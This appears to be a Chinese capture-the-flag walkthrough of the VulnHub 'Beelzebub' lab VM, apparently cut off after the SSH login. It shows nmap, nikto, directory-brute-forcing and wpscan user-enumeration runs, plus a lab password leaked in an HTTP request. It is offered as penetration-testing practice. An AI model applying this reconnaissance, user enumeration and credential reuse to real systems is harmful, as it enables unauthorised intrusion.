vulnhub中Beelzebub靶机

news2024/11/15 3:42:26

渗透思路

  • 一.信息收集
    • 1.网段探测
    • 2.端口探测
    • 3.常见漏洞扫描
    • 4.目录扫描
    • 5.web页面分析
  • 二.渗透
    • 继续目录扫描
    • ssh连接
    • 提权
    • 提权,flag

一.信息收集

1.网段探测

┌──(root㉿kali)-[~]
└─# nmap -Pn 192.168.0.0/24 --min-rate 10000                       
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-06 07:14 EST
Nmap scan report for 192.168.0.1 (192.168.0.1)
Host is up (0.0082s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE
80/tcp open  http
MAC Address: B8:3A:08:3B:F9:30 (Tenda Technology,Ltd.Dongguan branch)

Nmap scan report for 192.168.0.132 (192.168.0.132)
Host is up (0.0032s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:E4:F9:77 (VMware)

Nmap scan report for chronos.local (192.168.0.133)
Host is up (0.0045s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT    STATE SERVICE
80/tcp  open  http
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 7C:B5:66:A5:F0:A5 (Intel Corporate)

Nmap scan report for 192.168.0.130 (192.168.0.130)
Host is up (0.000015s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh

Nmap done: 256 IP addresses (4 hosts up) scanned in 1.31 seconds

2.端口探测

┌──(root㉿kali)-[~]
└─# nmap -A -sC -sV 192.168.0.132 --min-rate 10000                 
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-06 07:16 EST
Nmap scan report for 192.168.0.132 (192.168.0.132)
Host is up (0.0015s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 20d1ed84cc68a5a786f0dab8923fd967 (RSA)
|   256 7889b3a2751276922af98d27c108a7b9 (ECDSA)
|_  256 b8f4d661cf1690c5071899b07c70fdc0 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 00:0C:29:E4:F9:77 (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.53 ms 192.168.0.132 (192.168.0.132)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.48 seconds

3.常见漏洞扫描

┌──(root㉿kali)-[~]
└─# nmap --script=vuln -p80 192.168.0.132 --min-rate 10000
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-06 07:17 EST
Nmap scan report for 192.168.0.132 (192.168.0.132)
Host is up (0.00087s latency).

PORT   STATE SERVICE
80/tcp open  http
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /phpinfo.php: Possible information file
|_  /phpmyadmin/: phpMyAdmin
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
MAC Address: 00:0C:29:E4:F9:77 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 31.44 seconds

┌──(root㉿kali)-[~]
└─# nikto -h 192.168.0.132                        
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.0.132
+ Target Hostname:    192.168.0.132
+ Target Port:        80
+ Start Time:         2024-02-06 08:03:38 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 59558e1434548, mtime: gzip
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Multiple index files found: /index.php, /index.html
+ Allowed HTTP Methods: POST, OPTIONS, HEAD, GET 
+ /phpinfo.php: Output from the phpinfo() function was found.
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3233: /phpinfo.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 8067 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time:           2024-02-06 08:04:57 (GMT-5) (79 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

4.目录扫描

┌──(root㉿kali)-[~]
└─# dirb http://192.168.0.132               

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Tue Feb  6 07:18:49 2024
URL_BASE: http://192.168.0.132/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.0.132/ ----
+ http://192.168.0.132/index.html (CODE:200|SIZE:10918)                                                                                                                            
+ http://192.168.0.132/index.php (CODE:200|SIZE:271)                                                                                                                               
==> DIRECTORY: http://192.168.0.132/javascript/                                                                                                                                    
+ http://192.168.0.132/phpinfo.php (CODE:200|SIZE:95508)                                                                                                                           
==> DIRECTORY: http://192.168.0.132/phpmyadmin/                                                                                                                                    
+ http://192.168.0.132/server-status (CODE:403|SIZE:278)                                                                                                                           
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/javascript/ ----
==> DIRECTORY: http://192.168.0.132/javascript/jquery/                                                                                                                             
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/phpmyadmin/ ----
==> DIRECTORY: http://192.168.0.132/phpmyadmin/doc/                                                                                                                                
+ http://192.168.0.132/phpmyadmin/favicon.ico (CODE:200|SIZE:22486)                                                                                                                
+ http://192.168.0.132/phpmyadmin/index.php (CODE:200|SIZE:10633)                                                                                                                  
==> DIRECTORY: http://192.168.0.132/phpmyadmin/js/                                                                                                                                 
+ http://192.168.0.132/phpmyadmin/libraries (CODE:403|SIZE:278)                                                                                                                    
==> DIRECTORY: http://192.168.0.132/phpmyadmin/locale/                                                                                                                             
+ http://192.168.0.132/phpmyadmin/phpinfo.php (CODE:200|SIZE:10635)                                                                                                                
+ http://192.168.0.132/phpmyadmin/setup (CODE:401|SIZE:460)                                                                                                                        
==> DIRECTORY: http://192.168.0.132/phpmyadmin/sql/                                                                                                                                
+ http://192.168.0.132/phpmyadmin/templates (CODE:403|SIZE:278)                                                                                                                    
==> DIRECTORY: http://192.168.0.132/phpmyadmin/themes/                                                                                                                             
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/javascript/jquery/ ----
+ http://192.168.0.132/javascript/jquery/jquery (CODE:200|SIZE:268026)                                                                                                             
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/phpmyadmin/doc/ ----
==> DIRECTORY: http://192.168.0.132/phpmyadmin/doc/html/                                                                                                                           
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/phpmyadmin/js/ ----
==> DIRECTORY: http://192.168.0.132/phpmyadmin/js/jquery/                                                                                                                          
==> DIRECTORY: http://192.168.0.132/phpmyadmin/js/transformations/                                                                                                                 
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/phpmyadmin/locale/ ----
==> DIRECTORY: http://192.168.0.132/phpmyadmin/locale/az/                                                                                                                          
==> DIRECTORY: http://192.168.0.132/phpmyadmin/locale/bg/                                                                                                                          
==> DIRECTORY: http://192.168.0.132/phpmyadmin/locale/ca/                                                                                                                          
==> DIRECTORY: http://192.168.0.132/phpmyadmin/locale/cs/                                                                                                                          
==> DIRECTORY: http://192.168.0.132/phpmyadmin/locale/da/                                                                                                                          
==> DIRECTORY: http://192.168.0.132/phpmyadmin/locale/de/                                                                                                                          
==> DIRECTORY: http://192.168.0.132/phpmyadmin/locale/el/                                                                                                                          
==> DIRECTORY: http://192.168.0.132/phpmyadmin/locale/es/                                                                                                                          
==> DIRECTORY: http://192.168.0.132/phpmyadmin/locale/et/                                                                                                                          
==> DIRECTORY: http://192.168.0.132/phpmyadmin/locale/fi/                                                                                                                          
==> DIRECTORY: http://192.168.0.132/phpmyadmin/locale/fr/                                                                                                                          
==> DIRECTORY: http://192.168.0.132/phpmyadmin/locale/gl/                                                                                                                          
==> DIRECTORY: http://192.168.0.132/phpmyadmin/locale/hu/                                                                                                                          
==> DIRECTORY: http://192.168.0.132/phpmyadmin/locale/ia/                                                                                                                          
==> DIRECTORY: http://192.168.0.132/phpmyadmin/locale/id/                                                                                                                          
==> DIRECTORY: http://192.168.0.132/phpmyadmin/locale/it/                                                                                                                          
==> DIRECTORY: http://192.168.0.132/phpmyadmin/locale/ja/                                                                                                                          
==> DIRECTORY: http://192.168.0.132/phpmyadmin/locale/ko/                                                                                                                          
==> DIRECTORY: http://192.168.0.132/phpmyadmin/locale/lt/                                                                                                                          
==> DIRECTORY: http://192.168.0.132/phpmyadmin/locale/nl/                                                                                                                          
==> DIRECTORY: http://192.168.0.132/phpmyadmin/locale/pl/                                                                                                                          
==> DIRECTORY: http://192.168.0.132/phpmyadmin/locale/pt/                                                                                                                          
==> DIRECTORY: http://192.168.0.132/phpmyadmin/locale/pt_BR/                                                                                                                       
==> DIRECTORY: http://192.168.0.132/phpmyadmin/locale/ro/                                                                                                                          
==> DIRECTORY: http://192.168.0.132/phpmyadmin/locale/ru/                                                                                                                          
==> DIRECTORY: http://192.168.0.132/phpmyadmin/locale/si/                                                                                                                          
==> DIRECTORY: http://192.168.0.132/phpmyadmin/locale/sk/                                                                                                                          
==> DIRECTORY: http://192.168.0.132/phpmyadmin/locale/sl/                                                                                                                          
==> DIRECTORY: http://192.168.0.132/phpmyadmin/locale/sq/                                                                                                                          
==> DIRECTORY: http://192.168.0.132/phpmyadmin/locale/sv/                                                                                                                          
==> DIRECTORY: http://192.168.0.132/phpmyadmin/locale/tr/                                                                                                                          
==> DIRECTORY: http://192.168.0.132/phpmyadmin/locale/uk/                                                                                                                          
==> DIRECTORY: http://192.168.0.132/phpmyadmin/locale/vi/                                                                                                                          
==> DIRECTORY: http://192.168.0.132/phpmyadmin/locale/zh_CN/                                                                                                                       
==> DIRECTORY: http://192.168.0.132/phpmyadmin/locale/zh_TW/                                                                                                                       
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/phpmyadmin/sql/ ----
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/phpmyadmin/themes/ ----
==> DIRECTORY: http://192.168.0.132/phpmyadmin/themes/original/                                                                                                                    
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/phpmyadmin/doc/html/ ----
==> DIRECTORY: http://192.168.0.132/phpmyadmin/doc/html/_images/                                                                                                                   
+ http://192.168.0.132/phpmyadmin/doc/html/index.html (CODE:200|SIZE:13277)                                                                                                        
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/phpmyadmin/js/jquery/ ----
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/phpmyadmin/js/transformations/ ----
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/phpmyadmin/locale/az/ ----
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/phpmyadmin/locale/bg/ ----
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/phpmyadmin/locale/ca/ ----
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/phpmyadmin/locale/cs/ ----
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/phpmyadmin/locale/da/ ----
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/phpmyadmin/locale/de/ ----
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/phpmyadmin/locale/el/ ----
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/phpmyadmin/locale/es/ ----
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/phpmyadmin/locale/et/ ----
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/phpmyadmin/locale/fi/ ----
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/phpmyadmin/locale/fr/ ----
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/phpmyadmin/locale/gl/ ----
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/phpmyadmin/locale/hu/ ----
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/phpmyadmin/locale/ia/ ----
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/phpmyadmin/locale/id/ ----
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/phpmyadmin/locale/it/ ----
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/phpmyadmin/locale/ja/ ----
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/phpmyadmin/locale/ko/ ----
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/phpmyadmin/locale/lt/ ----
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/phpmyadmin/locale/nl/ ----
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/phpmyadmin/locale/pl/ ----
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/phpmyadmin/locale/pt/ ----
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/phpmyadmin/locale/pt_BR/ ----
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/phpmyadmin/locale/ro/ ----
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/phpmyadmin/locale/ru/ ----
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/phpmyadmin/locale/si/ ----
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/phpmyadmin/locale/sk/ ----
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/phpmyadmin/locale/sl/ ----
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/phpmyadmin/locale/sq/ ----
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/phpmyadmin/locale/sv/ ----
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/phpmyadmin/locale/tr/ ----
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/phpmyadmin/locale/uk/ ----
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/phpmyadmin/locale/vi/ ----
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/phpmyadmin/locale/zh_CN/ ----
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/phpmyadmin/locale/zh_TW/ ----
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/phpmyadmin/themes/original/ ----
==> DIRECTORY: http://192.168.0.132/phpmyadmin/themes/original/css/                                                                                                                
==> DIRECTORY: http://192.168.0.132/phpmyadmin/themes/original/img/                                                                                                                
==> DIRECTORY: http://192.168.0.132/phpmyadmin/themes/original/jquery/                                                                                                             
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/phpmyadmin/doc/html/_images/ ----
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/phpmyadmin/themes/original/css/ ----
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/phpmyadmin/themes/original/img/ ----
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/phpmyadmin/themes/original/jquery/ ----
==> DIRECTORY: http://192.168.0.132/phpmyadmin/themes/original/jquery/images/                                                                                                      
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/phpmyadmin/themes/original/jquery/images/ ----
                                                                                                                                                                                   
-----------------
END_TIME: Tue Feb  6 07:25:37 2024
DOWNLOADED: 244436 - FOUND: 12

┌──(root㉿kali)-[~]
└─# dirsearch -u "http://192.168.0.132"

  _|. _ _  _  _  _ _|_    v0.4.3                                                                                                                                                    
 (_||| _) (/_(_|| (_| )                                                                                                                                                             
                                                                                                                                                                                    
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/reports/http_192.168.0.132/_24-02-06_07-27-27.txt

Target: http://192.168.0.132/

[07:27:27] Starting:                                                                                                                                                                
[07:27:29] 403 -  278B  - /.ht_wsr.txt                                      
[07:27:29] 403 -  278B  - /.htaccess.bak1                                   
[07:27:29] 403 -  278B  - /.htaccess.orig                                   
[07:27:30] 403 -  278B  - /.htaccessBAK                                     
[07:27:30] 403 -  278B  - /.htaccessOLD                                     
[07:27:30] 403 -  278B  - /.htaccessOLD2                                    
[07:27:30] 403 -  278B  - /.htaccess_orig
[07:27:30] 403 -  278B  - /.htaccess_sc
[07:27:30] 403 -  278B  - /.html                                            
[07:27:30] 403 -  278B  - /.htaccess.save                                   
[07:27:30] 403 -  278B  - /.htpasswds
[07:27:30] 403 -  278B  - /.htaccess_extra
[07:27:30] 403 -  278B  - /.htm
[07:27:30] 403 -  278B  - /.htaccess.sample                                 
[07:27:30] 403 -  278B  - /.htpasswd_test                                   
[07:27:30] 403 -  278B  - /.httr-oauth                                      
[07:27:31] 403 -  278B  - /.php                                             
[07:27:55] 200 -  221B  - /index.php                                        
[07:27:55] 200 -  221B  - /index.php/login/                                 
[07:27:55] 301 -  319B  - /javascript  ->  http://192.168.0.132/javascript/ 
[07:28:04] 200 -   24KB - /phpinfo.php                                      
[07:28:04] 301 -  319B  - /phpmyadmin  ->  http://192.168.0.132/phpmyadmin/ 
[07:28:05] 200 -    3KB - /phpmyadmin/index.php                             
[07:28:05] 200 -    3KB - /phpmyadmin/doc/html/index.html                   
[07:28:05] 200 -    3KB - /phpmyadmin/                                      
[07:28:09] 403 -  278B  - /server-status/                                   
[07:28:09] 403 -  278B  - /server-status

5.web页面分析

在index.php页面的原代码中,发现提示,需要将beelzebub进行md5加密

在这里插入图片描述

我们将beelzebub进行md5加密后扫一下目录
d18e1e22becbd915b45e0e655429d487

在这里插入图片描述

┌──(root㉿kali)-[~]
└─# gobuster dir -u http://192.168.0.132/d18e1e22becbd915b45e0e655429d487 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.0.132/d18e1e22becbd915b45e0e655429d487
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/wp-content           (Status: 301) [Size: 352] [--> http://192.168.0.132/d18e1e22becbd915b45e0e655429d487/wp-content/]
/wp-includes          (Status: 301) [Size: 353] [--> http://192.168.0.132/d18e1e22becbd915b45e0e655429d487/wp-includes/]
/wp-admin             (Status: 301) [Size: 350] [--> http://192.168.0.132/d18e1e22becbd915b45e0e655429d487/wp-admin/]
Progress: 14154 / 220561 (6.42%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 15144 / 220561 (6.87%)
===============================================================
Finished
===============================================================

二.渗透

通过上面的gobuster扫描,扫到word press框架,然后使用wpscan扫描报错,且访问页面,会重定向到192.168.1.6的网页中

报错

┌──(root㉿kali)-[~]
└─#  wpscan --url http://192.168.0.132/d18e1e22becbd915b45e0e655429d487/ -e u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]N

Scan Aborted: The URL supplied redirects to http://192.168.1.6/d18e1e22becbd915b45e0e655429d487/. Use the --ignore-main-redirect option to ignore the redirection and scan the target, or change the --url option value to the redirected URL.

加参数;这里注意靶机中可以能加入了某种安全限制,导致暴力破解,会导致靶机断网,ping不到; 如发现页面访问不成功,请重启靶机


--url http://192.168.0.132/d18e1e22becbd915b45e0e655429d487: 这指定了要扫描的目标 URL
--plugins-detection aggressive: 这告诉 WPScan 使用“aggressive”(激进)模式来检测目标网站上安装的插件。
--ignore-main-redirect: 这个选项告诉 WPScan 忽略主页面上的任何重定向。
--force: 这个选项强制 WPScan 继续执行,即使它认为某些条件(如目标 URL 似乎是离线的)可能会导致扫描失败。
-e u: 这指定了 WPScan 的枚举模式。在这里,u 表示只枚举用户。
┌──(root㉿kali)-[~]
└─# wpscan --url http://192.168.0.132/d18e1e22becbd915b45e0e655429d487 --plugins-detection aggressive --ignore-main-redirect --force -e u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.0.132/d18e1e22becbd915b45e0e655429d487/ [192.168.0.132]
[+] Started: Tue Feb  6 08:49:44 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.4.29 (Ubuntu)
 |  - X-Redirect-By: WordPress
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.0.132/d18e1e22becbd915b45e0e655429d487/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.0.132/d18e1e22becbd915b45e0e655429d487/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.0.132/d18e1e22becbd915b45e0e655429d487/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.0.132/d18e1e22becbd915b45e0e655429d487/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.3.6 identified (Insecure, released on 2020-10-30).
 | Found By: Atom Generator (Aggressive Detection)
 |  - http://192.168.0.132/d18e1e22becbd915b45e0e655429d487/index.php/feed/atom/, <generator uri="https://wordpress.org/" version="5.3.6">WordPress</generator>
 | Confirmed By: Style Etag (Aggressive Detection)
 |  - http://192.168.0.132/d18e1e22becbd915b45e0e655429d487/wp-admin/load-styles.php, Match: '5.3.6'

[i] The main theme could not be detected.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <======================================================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] krampus
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] valak
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue Feb  6 08:49:46 2024
[+] Requests Done: 54
[+] Cached Requests: 9
[+] Data Sent: 17.489 KB
[+] Data Received: 158.542 KB
[+] Memory used: 155.383 MB
[+] Elapsed time: 00:00:01

这里我们爆出来krampus/valak两个用户

继续目录扫描

┌──(root㉿kali)-[~]
└─# dirb http://192.168.0.132/d18e1e22becbd915b45e0e655429d487                          

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Tue Feb  6 09:09:32 2024
URL_BASE: http://192.168.0.132/d18e1e22becbd915b45e0e655429d487/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.0.132/d18e1e22becbd915b45e0e655429d487/ ----
+ http://192.168.0.132/d18e1e22becbd915b45e0e655429d487/index.php (CODE:200|SIZE:57718)                                                                                            
==> DIRECTORY: http://192.168.0.132/d18e1e22becbd915b45e0e655429d487/wp-admin/                                                                                                     
==> DIRECTORY: http://192.168.0.132/d18e1e22becbd915b45e0e655429d487/wp-content/                                                                                                   
==> DIRECTORY: http://192.168.0.132/d18e1e22becbd915b45e0e655429d487/wp-includes/                                                                                                  
+ http://192.168.0.132/d18e1e22becbd915b45e0e655429d487/xmlrpc.php (CODE:405|SIZE:42)                                                                                              
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/d18e1e22becbd915b45e0e655429d487/wp-admin/ ----
+ http://192.168.0.132/d18e1e22becbd915b45e0e655429d487/wp-admin/admin.php (CODE:302|SIZE:0)                                                                                       
==> DIRECTORY: http://192.168.0.132/d18e1e22becbd915b45e0e655429d487/wp-admin/css/                                                                                                 
==> DIRECTORY: http://192.168.0.132/d18e1e22becbd915b45e0e655429d487/wp-admin/images/                                                                                              
==> DIRECTORY: http://192.168.0.132/d18e1e22becbd915b45e0e655429d487/wp-admin/includes/                                                                                            
+ http://192.168.0.132/d18e1e22becbd915b45e0e655429d487/wp-admin/index.php (CODE:302|SIZE:0)                                                                                       
==> DIRECTORY: http://192.168.0.132/d18e1e22becbd915b45e0e655429d487/wp-admin/js/                                                                                                  
==> DIRECTORY: http://192.168.0.132/d18e1e22becbd915b45e0e655429d487/wp-admin/maint/                                                                                               
==> DIRECTORY: http://192.168.0.132/d18e1e22becbd915b45e0e655429d487/wp-admin/network/                                                                                             
==> DIRECTORY: http://192.168.0.132/d18e1e22becbd915b45e0e655429d487/wp-admin/user/                                                                                                
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/d18e1e22becbd915b45e0e655429d487/wp-content/ ----
+ http://192.168.0.132/d18e1e22becbd915b45e0e655429d487/wp-content/index.php (CODE:200|SIZE:0)                                                                                     
==> DIRECTORY: http://192.168.0.132/d18e1e22becbd915b45e0e655429d487/wp-content/plugins/                                                                                           
==> DIRECTORY: http://192.168.0.132/d18e1e22becbd915b45e0e655429d487/wp-content/themes/                                                                                            
==> DIRECTORY: http://192.168.0.132/d18e1e22becbd915b45e0e655429d487/wp-content/upgrade/                                                                                           
==> DIRECTORY: http://192.168.0.132/d18e1e22becbd915b45e0e655429d487/wp-content/uploads/                                                                                           
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/d18e1e22becbd915b45e0e655429d487/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/d18e1e22becbd915b45e0e655429d487/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/d18e1e22becbd915b45e0e655429d487/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/d18e1e22becbd915b45e0e655429d487/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/d18e1e22becbd915b45e0e655429d487/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                   
---- Entering directory: http://192.168.0.132/d18e1e22becbd915b45e0e655429d487/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)

在http://192.168.0.132/d18e1e22becbd915b45e0e655429d487/wp-content/uploads/目录下发现一个奇快的目录Talk,点击

在这里插入图片描述

随便输入一个名字,在返回的request包中,包含password:M4k3Ad3a1

在这里插入图片描述

ssh连接

将扫描出来的用户,都用这个密码登陆,得出krampus/M4k3Ad3a1

┌──(root㉿kali)-[~]
└─# ssh krampus@192.168.0.132                             
The authenticity of host '192.168.0.132 (192.168.0.132)' can't be established.
ED25519 key fingerprint is SHA256:z1Xg/pSBrK8rLIMLyeb0L7CS1YL4g7BgCK95moiAYhQ.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.0.132' (ED25519) to the list of known hosts.
krampus@192.168.0.132's password: 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 5.3.0-53-generic x86_64)

 * Documentation:  https://help.ubuntu.com
